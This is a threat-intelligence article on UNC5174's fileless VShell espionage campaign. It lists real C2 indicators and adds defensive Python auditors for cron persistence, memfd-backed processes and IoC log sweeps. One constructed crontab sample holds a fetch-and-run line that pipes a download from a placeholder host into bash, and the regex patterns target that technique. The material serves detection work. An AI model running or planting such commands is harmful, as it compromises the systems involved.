UNC Returns: China-Linked Threat Group Unleashes Fileless Malware in Sophisticated Espionage Campaign


A new cyber threat has emerged on the global stage, as Chinese state-sponsored group UNC5174 returns with a dangerous and stealthy campaign that exemplifies the next evolution in cyber-espionage. Leveraging advanced tools like the open-source remote access trojan VShell and fileless malware techniques, this threat actor has rearmed with a redesigned command-and-control infrastructure that targets sensitive industries around the world.

Discovered in early 2025 by Sysdig’s Threat Research Team, the operation demonstrates a remarkable fusion of stealth, persistence, and technical finesse. This campaign is not just a flash in the pan — it’s a clear signal of the growing sophistication of state-aligned cyber operations, especially those tied to China’s intelligence apparatus.

UNC5174’s 2025 Campaign at a Glance

In this new wave of attacks, UNC5174 shows a clear evolution in both tooling and tactics. Here’s what makes this campaign noteworthy:

  • Introduction of VShell: A powerful new Remote Access Trojan written by a Chinese developer, VShell is being praised in underground circles as a worthy successor to tools like Cobalt Strike.
  • Fileless Malware Delivery: Malware is deployed directly into system memory via the memfd_create syscall, avoiding disk writes and sidestepping most antivirus solutions.
  • Bash-Based Initial Loader: This script not only checks for elevated privileges but also ensures persistence via cron jobs and system service tampering.
  • Multiple Payloads:
    – SNOWLIGHT: Acts as a dropper for VShell.
    – system_worker: A Sliver implant designed for deep system access.
    – dnsloger: Likely a renamed or customized SNOWLIGHT binary for extended functionality.
  • Obfuscation and Masquerading: Tools like Gobfuscate and UPX are used to hide code logic, while fake process names (e.g., kworker/0:2) help mask activity.
  • C2 Infrastructure Innovation: Using domain squatting and spoofing — like gooogleasia[.]com and sex666vr[.]com — UNC5174 builds fake trust while communicating via encrypted channels, WebSockets, and even mTLS.
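The loader's persistence mechanisms (cron jobs and service tampering) are the part of this chain that survives a reboot and that a host audit can actually enumerate. The following is an added example, not code from the article or from Sysdig's report: it audits crontab text and a systemd unit body for the patterns a loader script typically leaves behind. The crontab and unit contents are constructed samples, the helper names audit_cron() and audit_unit() are hypothetical, and the heuristics are deliberately simple.

```python
"""Audit crontab and systemd unit text for loader-style persistence:
commands run from world-writable temp dirs, download-and-pipe-to-shell
one-liners, and ExecStart paths outside package-managed bin dirs.
Added example; inputs are constructed and helper names hypothetical."""
import re

# "/tmp/", "/dev/shm/", "/var/tmp/" when they start a path token
TEMP_PATH_RE = re.compile(r"(?<![\w/.-])(?:/tmp|/dev/shm|/var/tmp)/")
# curl/wget ... | sh / bash / dash / zsh
PIPE_TO_SHELL_RE = re.compile(r"\b(?:curl|wget)\b[^|;]*\|\s*(?:ba|da|z)?sh\b")
TRUSTED_BIN_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/",
                    "/usr/libexec/", "/usr/local/bin/", "/usr/local/sbin/")


def audit_cron(text: str):
    """Return [(line_no, reason, line)] for suspicious crontab entries."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # blank line, comment or environment assignment
        if TEMP_PATH_RE.search(line):
            findings.append((n, "command runs from a world-writable temp dir", line))
        if PIPE_TO_SHELL_RE.search(line):
            findings.append((n, "downloads a script and pipes it into a shell", line))
    return findings


def audit_unit(text: str):
    """Return [(reason, ExecStart path)] for a systemd unit body."""
    findings = []
    for raw in text.splitlines():
        # ExecStart may carry prefix characters such as "-" or "@" before the path
        m = re.match(r"\s*ExecStart\s*=\s*[-@:+!]*(\S+)", raw)
        if not m:
            continue
        exe = m.group(1)
        if TEMP_PATH_RE.search(exe):
            findings.append(("ExecStart runs from a world-writable temp dir", exe))
        elif not exe.startswith(TRUSTED_BIN_DIRS):
            findings.append(("ExecStart outside package-managed bin dirs", exe))
    return findings


# Constructed samples: one system crontab with two planted entries,
# one service unit pointing at /tmp, one benign unit for contrast.
CRONTAB = """\
# /etc/crontab (constructed sample)
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root /dev/shm/.x/dnsloger >/dev/null 2>&1
@reboot root curl -s http://loader.example.invalid/s | bash
"""

SUSPECT_UNIT = """\
[Unit]
Description=System worker

[Service]
ExecStart=/tmp/.cache/system_worker
Restart=always

[Install]
WantedBy=multi-user.target
"""

BENIGN_UNIT = """\
[Service]
ExecStart=/usr/sbin/sshd -D
"""

if __name__ == "__main__":
    for n, reason, line in audit_cron(CRONTAB):
        print(f"crontab line {n}: {reason}: {line}")
    for reason, exe in audit_unit(SUSPECT_UNIT) + audit_unit(BENIGN_UNIT):
        print(f"unit: {reason}: {exe}")
```

On a live host the same functions can be fed the contents of /etc/crontab, /etc/cron.d/*, each user's crontab and the unit files under /etc/systemd/system; a unit installed by a package manager that legitimately runs from /opt will also be reported by the second check, so treat that finding as "review", not "malicious".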

Detection remains difficult, though tools like Falco are introducing behavioral rules to identify in-memory anomalies.
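Both of the in-memory tricks listed above leave a trace in /proc that a behavioural rule can key on: a binary executed from a memfd_create descriptor has an exe link of the form "/memfd:<name> (deleted)", and a user process that borrows a kernel-thread name such as kworker/0:2 still has a userland parent, a real executable and a non-empty command line, which genuine kernel threads never do. The following is an added example, not code from the article or from Sysdig/Falco: it applies those two checks (plus a "runs from a temp dir" check) to a process snapshot. The snapshot is constructed; scan_snapshot() and read_live_snapshot() are hypothetical helper names.

```python
"""Flag processes that execute from anonymous memory (memfd_create) or
masquerade as kernel threads. Added example; the snapshot is constructed
and the helper names are hypothetical."""
import os
import re
from dataclasses import dataclass, field


@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str        # /proc/<pid>/comm
    exe: str         # readlink(/proc/<pid>/exe); '' for kernel threads
    cmdline: str     # /proc/<pid>/cmdline with NULs replaced by spaces
    exec_maps: list = field(default_factory=list)  # paths of executable mappings


KTHREAD_NAME_RE = re.compile(r"^(kworker|ksoftirqd|migration|rcu_|kswapd)")
TEMP_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")


def is_memfd_backed(p: Proc) -> bool:
    # A memfd-executed image shows up as "/memfd:<name> (deleted)" both in
    # the exe link and as the path of its executable mappings.
    return p.exe.startswith("/memfd:") or any(m.startswith("/memfd:") for m in p.exec_maps)


def is_kthread_masquerade(p: Proc) -> bool:
    # Genuine kernel threads are children of kthreadd (pid 2), expose no
    # exe link and have an empty cmdline; kthreadd itself is pid 2.
    if p.pid == 2 or not KTHREAD_NAME_RE.match(p.comm):
        return False
    looks_genuine = p.ppid == 2 and p.exe == "" and p.cmdline == ""
    return not looks_genuine


def runs_from_temp_dir(p: Proc) -> bool:
    return p.exe.startswith(TEMP_DIRS)


def scan_snapshot(procs):
    """Return [(pid, comm, [reasons])] for every process worth a look."""
    findings = []
    for p in procs:
        reasons = []
        if is_memfd_backed(p):
            reasons.append("executable backed by memfd (no file on disk)")
        if is_kthread_masquerade(p):
            reasons.append("kernel-thread name on a user process")
        if runs_from_temp_dir(p):
            reasons.append("executable lives in a world-writable temp dir")
        if reasons:
            findings.append((p.pid, p.comm, reasons))
    return findings


def read_live_snapshot():
    """Build Proc entries from the running system's /proc (Linux only)."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        base = f"/proc/{entry}"
        try:
            with open(f"{base}/stat") as f:          # "pid (comm) state ppid ..."
                ppid = int(f.read().rsplit(")", 1)[1].split()[1])
            with open(f"{base}/comm") as f:
                comm = f.read().strip()
            with open(f"{base}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            try:
                exe = os.readlink(f"{base}/exe")
            except OSError:
                exe = ""                             # kernel thread or no permission
            maps = []
            with open(f"{base}/maps") as f:
                for line in f:
                    parts = line.split(maxsplit=5)  # addr perms offset dev inode path
                    if len(parts) == 6 and "x" in parts[1]:
                        maps.append(parts[5].strip())
        except OSError:
            continue                                 # process exited mid-read
        procs.append(Proc(int(entry), ppid, comm, exe, cmdline, maps))
    return procs


# Constructed snapshot: kthreadd, a real kworker, sshd, a fileless payload
# hiding behind the kworker name, and a dropper running from /tmp.
SNAPSHOT = [
    Proc(2, 0, "kthreadd", "", ""),
    Proc(19, 2, "kworker/0:2", "", ""),
    Proc(1342, 1, "sshd", "/usr/sbin/sshd", "/usr/sbin/sshd -D", ["/usr/sbin/sshd"]),
    Proc(2077, 2011, "kworker/0:2", "/memfd:x (deleted)", "./kworker/0:2", ["/memfd:x (deleted)"]),
    Proc(2081, 2011, "dnsloger", "/tmp/.d/dnsloger", "/tmp/.d/dnsloger", ["/tmp/.d/dnsloger"]),
]

if __name__ == "__main__":
    for pid, comm, reasons in scan_snapshot(SNAPSHOT):
        print(f"pid {pid} ({comm}): " + "; ".join(reasons))
```

Replace SNAPSHOT with read_live_snapshot() to run the same checks on a Linux host (root is needed to read other users' exe links); a scan of a point-in-time snapshot is still reactive, which is why the article's call for syscall tracing of memfd_create and execve events matters.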

Targets and Risk Profile

The operation primarily targets:

  • Critical Infrastructure
  • Technology and Research Organizations
  • NGOs across North America, Europe, and Asia-Pacific

These industries are of strategic interest to the Chinese state, aligning with long-term espionage goals.

Key Indicators of Compromise (IoCs)

| Type | Value | Note |
|---|---|---|
| Domain | vs[.]gooogleasia[.]com | VShell console C2 |
| Domain | gooogleasia[.]com, sex666vr[.]com | Core C2 domains |
| IP address | 34[.]96[.]239[.]183, 8[.]219[.]171[.]47 | C2 hosting servers |
| SHA256 | `e6db3de3…` | SNOWLIGHT |
| SHA256 | `8d889441…` | Fileless VShell |
| SHA256 | `21ccb258…` | Sliver implant |
| URL | http://vs[.]gooogleasia[.]com:8443/?… | VShell downloader |
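The table's values are defanged, so they have to be refanged before they can be compared with DNS or proxy logs, and a plain list match will miss the next squat the group registers. The following is an added example, not code from the article or from Sysdig: it refangs the table's domains and IPs, sweeps log lines for them, and adds a simple lookalike heuristic that catches repeated-letter squats such as gooogleasia by squeezing runs of identical letters before comparing against a brand watchlist. The log lines and the watchlist are constructed; sweep_logs() and looks_like_brand() are hypothetical helper names.

```python
"""Refang the IoCs from the table, sweep constructed log lines for them,
and flag repeated-letter brand squats. Added example; the log lines and
brand watchlist are constructed, helper names hypothetical."""
import re
from urllib.parse import urlsplit

# Indicators exactly as the table lists them (defanged).
RAW_IOCS = {
    "domain": ["vs[.]gooogleasia[.]com", "gooogleasia[.]com", "sex666vr[.]com"],
    "ip": ["34[.]96[.]239[.]183", "8[.]219[.]171[.]47"],
}
WATCHED_BRANDS = ["google"]          # constructed watchlist
KV_RE = re.compile(r"(\w+)=(\S+)")   # key=value tokens in the log lines
REPEATS_RE = re.compile(r"(.)\1+")   # "ooo" -> "o"


def refang(value: str) -> str:
    """Undo the usual defanging so the value can be compared with live data."""
    value = value.replace("[.]", ".").replace("(.)", ".")
    return re.sub(r"^hxxp", "http", value, flags=re.IGNORECASE)


def domain_hits(name: str, domains) -> bool:
    """True for an exact listed domain or any subdomain of one."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in domains)


def looks_like_brand(name: str, brands=WATCHED_BRANDS) -> bool:
    """Squeeze repeated letters so 'gooogle' and 'google' compare equal."""
    squeezed = REPEATS_RE.sub(r"\1", name.lower())
    return any(REPEATS_RE.sub(r"\1", b.lower()) in squeezed for b in brands)


def sweep_logs(lines, raw_iocs=RAW_IOCS):
    """Return [(timestamp, [reasons])] for each line that touches an IoC."""
    domains = {refang(d).lower() for d in raw_iocs["domain"]}
    ips = {refang(i) for i in raw_iocs["ip"]}
    hits = []
    for line in lines:
        fields = dict(KV_RE.findall(line))
        reasons = []
        query = fields.get("query")
        if query:
            if domain_hits(query, domains):
                reasons.append(f"dns:{query.lower()}")
            elif looks_like_brand(query):
                reasons.append(f"lookalike:{query.lower()}")
        dst = fields.get("dst")
        if dst:
            host = dst.rsplit(":", 1)[0]       # strip the port
            if host in ips:
                reasons.append(f"ip:{host}")
        url = fields.get("url")
        if url:
            host = urlsplit(url).hostname
            if host and domain_hits(host, domains):
                reasons.append(f"url:{host}")
        if reasons:
            hits.append((line.split()[0], reasons))
    return hits


# Constructed DNS and proxy lines: the first two mirror the table's
# downloader URL, the last is a squat that is not in the table.
LOG_LINES = [
    "2025-03-02T10:14:05Z dns client=10.0.0.5 query=vs.gooogleasia.com type=A",
    "2025-03-02T10:14:06Z proxy src=10.0.0.5 dst=34.96.239.183:8443 url=http://vs.gooogleasia.com:8443/?x=1",
    "2025-03-02T10:15:11Z dns client=10.0.0.7 query=mail.example.com type=MX",
    "2025-03-02T10:16:40Z proxy src=10.0.0.9 dst=93.184.216.34:443 url=https://www.example.com/",
    "2025-03-02T10:17:02Z dns client=10.0.0.8 query=goooooogleasia.net type=A",
]

if __name__ == "__main__":
    for ts, reasons in sweep_logs(LOG_LINES):
        print(ts, ", ".join(reasons))
```

The lookalike check is intentionally narrow (repeated letters only); digit-for-letter swaps or homoglyphs need a separate mapping, and every lookalike finding should be triaged rather than blocked outright.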

What Undercode Says:

UNC5174’s latest operation reflects a strategic convergence of cybercriminal ingenuity and state-level objectives. The use of open-source tooling like VShell isn’t just about saving money — it’s about muddying the waters of attribution. Open tools make it harder for analysts to connect specific malware samples to a particular group or nation-state, especially when the code is widely circulated.

From a tactical perspective, fileless malware is becoming the go-to weapon for persistent threat actors. By operating entirely in memory, the malware sidesteps traditional disk-based detection mechanisms — which are still the primary defense layer for many organizations. This level of evasion, especially when combined with memory-based syscalls like memfd_create, represents the bleeding edge of stealth tactics.

Their command-and-control architecture also deserves scrutiny. Instead of using traditional HTTP/S beacons, UNC5174 leverages WebSockets and encrypted channels (mTLS, WireGuard) — providing low-latency, interactive control over compromised hosts. Add domain spoofing on top, and the group is executing one of the most elusive and scalable C2 strategies we’ve seen in recent months.

The SNOWLIGHT dropper plays a pivotal role in this campaign. It’s a Linux-native implant previously tied to attacks on F5 devices, but it’s evolved. Now, it works seamlessly with VShell to operate without detection, bypassing endpoint monitoring and application controls.

Another layer of complexity lies in their multi-payload strategy. The integration of Sliver — an offensive security framework — shows the group’s intent to embed deeply into systems and maintain control over extended periods. This isn’t smash-and-grab malware; it’s slow, silent, and strategic.

Their choice of victims also highlights long-term goals: tapping into intellectual property, sensitive diplomatic strategies, and infrastructure data — all of which hold immense geopolitical value.

Cloud-based infrastructure hosted in Hong Kong further clouds attribution and complicates take-down efforts, thanks to the scalability and ephemerality of cloud IP ranges.

As for defense, while tools like Falco are catching up with new rules, detection is still reactive. The cybersecurity community must shift toward proactive memory inspection, system call tracing, and behavioral analytics to stay ahead.

This campaign is not just a security incident — it’s a warning shot for what’s coming. UNC5174 and groups like it are mastering the art of digital espionage. And unless defenders rethink their approach, they’re going to stay several steps behind.

Fact Checker Results:

  • UNC5174’s association with China is well-documented by threat intel researchers.
  • VShell and SNOWLIGHT have been independently verified through multiple security firms.
  • Fileless malware deployment via memory-based syscalls is a confirmed trend in current APT campaigns.

References:

Reported By: cyberpress.org